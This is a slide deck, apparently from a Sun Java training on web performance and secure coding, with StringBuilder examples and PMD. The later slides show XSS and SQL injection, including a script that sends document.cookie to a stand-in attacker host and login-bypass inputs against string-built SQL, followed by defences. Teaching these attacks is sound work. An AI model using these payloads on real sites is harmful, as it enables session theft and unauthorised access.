SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our User Agreement and Privacy Policy.
SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our Privacy Policy and User Agreement for details.
Successfully reported this slideshow.
Activate your 14 day free trial to unlock unlimited reading.
3.
Web 效能概觀
• 所有程式都受到三種系統限制
> CPU速度
> 記憶體
> 輸出/輸入
Footnote position, 12 pts.
Sun Confidential: Internal Only 3
4.
CPU-bound類型的程式
• 著重在提昇程式效率的演算法
Sun Confidential: Internal Only 4
5.
記憶體
• Java 有垃圾收集
> 可以沒有顧忌的配置物件?
> 系統中有太多短命的物件?
• 大型物件浪費記憶體
> 建立物件、垃圾收集
Sun Confidential: Internal Only 5
6.
輸入/輸出
• 輸出輸入絕對會拖慢程式
> 磁碟存取(檔案讀寫、日誌…)
> 資料庫存取(增、刪、查、找…)
> 網路存取(DNS反查…)
Sun Confidential: Internal Only 6
7.
從1到100
• 撰寫一個程式,可在文字模式上顯示
HOW DO YOU DO
Footnote position, 12 pts.
Sun Confidential: Internal Only 7
8.
How do you do
for(int i = 1; i < 100; i++) {
System.out.print(i + "+");
}
System.out.println(100);
• 在迴圈中經常犯的兩種錯誤
> 非必要的輸出/輸入
> 非必要的建構物件
Sun Confidential: Internal Only 8
9.
How do you do
• 改進了輸出
String output = "";
for(int i = 1; i < 100; i++) {
output = output + i + "+";
} 一次 IO
output += 100;
System.out.println(output);
Sun Confidential: Internal Only 9
10.
How do you do
• 物件的重用(一)
StringBuffer output = new StringBuffer();
for(int i = 1; i < 100; i++) {
output.append(i);
output.append("+");
}
output.append(100);
System.out.println(output); 重用物件
Sun Confidential: Internal Only 10
11.
How do you do
• 物件的重用(二)
StringBuffer output = new StringBuffer(300);
for(int i = 1; i < 100; i++) {
output.append(i);
output.append("+");
}
output.append(100);
System.out.println(output);
預設16字元
Sun Confidential: Internal Only 11
12.
How do you do
• 執行緒議題
StringBuilder output = new StringBuilder(300);
for(int i = 1; i < 100; i++) {
output.append(i);
output.append("+");
}
output.append(100);
System.out.println(output);
JDK 5.0以上
Sun Confidential: Internal Only 12
35.
程式碼分析
• http://pmd.sourceforge.net/
• PMD scans Java source code and looks for
potential problems like:
> Possible bugs - empty try/catch/finally/switch
statements
> Dead code - unused local variables, parameters and
private methods
> Suboptimal code - wasteful String/StringBuffer
usage
> Overcomplicated expressions - unnecessary if
statements, for loops that could be while loops
> Duplicate code - copied/pasted code means
copied/pasted bugs
Sun Confidential: Internal Only 35
40.
XSS:Session hijacking
• 例如搜尋功能回送使用者輸入的查詢字串
Could not find any documents including ‘foo’
Sun Confidential: Internal Only 40
41.
XSS:Session hijacking
Search <b>foo</b>
Could not find any documents including ‘<b>foo</b>’
Could not find any documents including ‘foo’
Sun Confidential: Internal Only 41
42.
XSS:Session hijacking
<script language=‘javascript’>alert(document.cookie)</script>
Could not find any documents including
‘<script language=‘javascript’>alert(document.cookie)</script>’
Sun Confidential: Internal Only 42
43.
XSS:Session hijacking
入侵
www.hahaorz.com
http://www.xssorz.com/search?query=foo
www.xssorz.com
Sun Confidential: Internal Only 43
44.
XSS:Session hijacking
入侵
www.hahaorz.com
http://www.xssorz.com/search?query=foo
<script
language='javascript'>document.location="http://ww
w.hahaorz.com/foo" +document.cookie</script>
www.xssorz.com
Sun Confidential: Internal Only 44
45.
XSS:Session hijacking
入侵
www.hahaorz.com
http://www.xssorz.com/search?query=foo
%3Cscript+language%3D%27javascript%27%3Edocu
ment.cookies%3C%2Fscript%3E
www.xssorz.com
Sun Confidential: Internal Only 45
46.
XSS:Session hijacking
入侵
www.hahaorz.com
http://www.xssorz.com/search?query%3Cs
cript+language%3D%27javascript%27%3E
document.cookies%3C%2Fscript%3E
www.xssorz.com
www.e04orz.com
Sun Confidential: Internal Only 46
47.
XSS:Session hijacking
入侵
www.hahaorz.com
<a href =http://www.xssorz.com/search?query%3C
script+language%3D%27javascript%27%3Edocumen
t.cookies%3C%2Fscript%3E
>可以找到很多美女圖^o^</a>
www.xssorz.com
www.e04orz.com
Sun Confidential: Internal Only 47
48.
XSS:Session hijacking
入侵
www.hahaorz.com
可以找到很多猛男圖^o^
www.xssorz.com
www.e04orz.com
Sun Confidential: Internal Only 48
49.
XSS:Session hijacking
入侵
www.hahaorz.com
可以找到很多猛男圖^o^
JSESSIONID=0146B416F…
www.xssorz.com
www.e04orz.com
Sun Confidential: Internal Only 49
50.
XSS:Phishing
<script language='javascript'>document.location="http://www.svn.com/foo"
+document.cookie</script>
留言版、討論區
http://java.sun.com/forum
Sun Confidential: Internal Only 50
51.
XSS:Phishing
<script language='javascript'>document.location="http://www.svn.com/foo"
+document.cookie</script>
留言版、討論區
http://java.svn.com/forum
http://java.svn.com/forum
Sun Confidential: Internal Only 51
52.
XSS
• 過濾請求資料
> < <
> > >
> <script>
Sun Confidential: Internal Only 52
53.
隱碼攻擊
• SQL Injection
名稱: 密碼:
Statement statement = connection.createStatement();
String queryString = “SELECT * FROM USER_TABLE WHERE USERNAME=‘” +
username + “’ AND PASSWORD=‘” + password + “’;”;
ResultSet resultSet = statement.executeQuery(queryString);
“SELECT * FROM USER_TABLE WHERE USERNAME=‘” +
username + “’ AND PASSWORD=‘” + password + “’;”
Sun Confidential: Internal Only 53
54.
SQL Injection
名稱: caterpillar 密碼: 123456
Statement statement = connection.createStatement();
String queryString = “SELECT * FROM USER_TABLE WHERE USERNAME=‘” +
username + “’ AND PASSWORD=‘” + password + “’;”;
ResultSet resultSet = statement.executeQuery(queryString);
“SELECT * FROM USER_TABLE WHERE USERNAME=‘caterpillar’ AND
PASSWORD=‘123456’;
Sun Confidential: Internal Only 54
55.
SQL Injection
名稱: caterpillar 密碼: ‘ OR ‘1’=‘1
Statement statement = connection.createStatement();
String queryString = “SELECT * FROM USER_TABLE WHERE USERNAME=‘” +
username + “’ AND PASSWORD=‘” + password + “’;”;
ResultSet resultSet = statement.executeQuery(queryString);
“SELECT * FROM USER_TABLE WHERE USERNAME=‘caterpillar’ AND
PASSWORD=‘‘ OR ‘1’=‘1’;
總是為true
Sun Confidential: Internal Only 55
56.
SQL Injection
名稱: caterpillar’;# 密碼:
Statement statement = connection.createStatement();
String queryString = “SELECT * FROM USER_TABLE WHERE USERNAME=‘” +
username + “’ AND PASSWORD=‘” + password + “’;”;
ResultSet resultSet = statement.executeQuery(queryString);
“SELECT * FROM USER_TABLE WHERE USERNAME=‘caterpillar’;# AND
PASSWORD=‘‘ OR ‘’;
註解符號
Sun Confidential: Internal Only 56
57.
SQL Injection
• 使用PreparedStatement
PreparedStatement stmt = conn.prepareStatement(
“SELECT * FROM USER_TABLE WHERE USERNAME=? AND
PASSWORD=?");
• 過濾請求資料
> 單引號 '
> 雙引號 "
Sun Confidential: Internal Only 57
58.
自動檢測安全工具
• 在開發程式的過程中帶入安全觀念與工具
> 在程式撰寫階段應用安全掃描工具
> 在測試階段實行滲透(permeation)測試
> 對已上線的產品進行補強
Sun Confidential: Internal Only 58
59.
自動檢測安全工具
• Watchfire Web Appscan
• Acunetrix
• Fortify
Sun Confidential: Internal Only 59